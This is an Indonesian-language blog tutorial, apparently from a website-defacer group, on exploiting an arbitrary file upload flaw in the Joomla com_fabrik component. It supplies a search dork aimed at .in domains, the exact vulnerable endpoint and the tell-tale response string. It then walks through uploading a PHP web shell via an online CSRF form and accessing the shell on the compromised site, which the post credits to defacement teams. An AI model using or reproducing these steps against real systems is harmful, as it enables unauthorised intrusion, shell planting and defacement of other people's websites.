www.squadcyber.org - Yohooo guys kali ini wa mau kasih tutorial pepes metode Component Fabrik Abitrary File Upload. Kali ini metode com fabrik menggunakan CSRF :v atau bisa di bilang exploit baru :v Yuks disimak mang :v
Bahan" :
Dork : inurl:index.php?option=com_fabrik site:.in (kembangin lagi mang biar dapet banyak :v)
Exploit : www.website.co.li/[path]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
CSRF online nya : TOUCH HERE~~!
(CSRF online ini buatan P4kL0nc4t dari tim Obsidian Cyber Team)
Langsung sadja :v
1. Dorking pakek dork di atas
2. Kalo udah dapet target, masukin exploit nya. Vuln? ada tulisan {"filepath":null,"uri":null}
3. Buka CSRF online nya. POST File to URL isi dengan url target, POST Parameter Name isi dengan file. Kurang jelas cek gambar. Kalo udah upload shell lu ext .php
4. Sukses? ada tulisan kek di gambar :v
5. Akses? www.website.co.li/[path]/shelllu.php
6. Done ea :v tinggal di eue :v
Sekian dari ane :v
Maap kalo ada salah/kurang jelas >.<
Thanks :*
Special Thanks to : IDTT ( Indonesia Defacer Tersakiti Team) & P4kL0nc4t (Obsidian Cyber Team) :*






Comments
Post a Comment